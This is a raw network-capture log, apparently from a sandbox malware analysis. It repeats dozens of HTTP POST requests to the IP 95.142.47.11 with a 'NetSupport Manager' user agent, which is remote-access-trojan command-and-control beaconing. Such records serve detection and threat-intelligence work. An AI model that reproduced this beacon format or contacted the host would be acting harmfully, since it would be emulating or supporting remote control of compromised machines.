                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:54.030848026 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:54.136715889 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:54.238419056 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:54.337743998 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:54.437772036 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:54.538789034 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:54.638928890 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:54.741472960 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:54.842886925 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:54.942912102 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:55.043812990 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:55.160759926 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:55.260941029 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:55.360769033 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:55.461869955 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:55.562009096 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:55.663049936 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:55.763072968 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:55.862938881 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:55.963927031 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:56.064851999 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:56.164697886 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:56.265942097 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:56.365721941 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:56.506597042 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:56.607753992 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:56.707700014 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:57.084851027 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:57.286703110 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:57.386696100 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:57.489109993 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:57.588999033 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:57.689857006 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:57.789783001 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:57.890741110 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:57.990806103 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:58.091044903 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:58.196222067 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:58.295907974 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:58.395716906 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:58.497028112 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:58.596849918 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:58.696944952 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:58.797024965 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:58.897896051 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:58.998969078 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:59.098918915 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:59.199868917 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:59.302565098 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:59.402739048 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:59.502811909 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:59.603734970 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:59.704004049 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:59.804160118 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:59.904778957 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:00.005847931 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:00.106790066 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:00.212033033 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:00.312762976 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:00.413752079 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:00.513847113 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:00.614734888 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:00.714734077 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:00.815900087 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:00.915787935 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:01.016777992 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:01.116897106 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:01.223054886 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:01.322915077 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:01.423901081 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:36:01.525547028 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
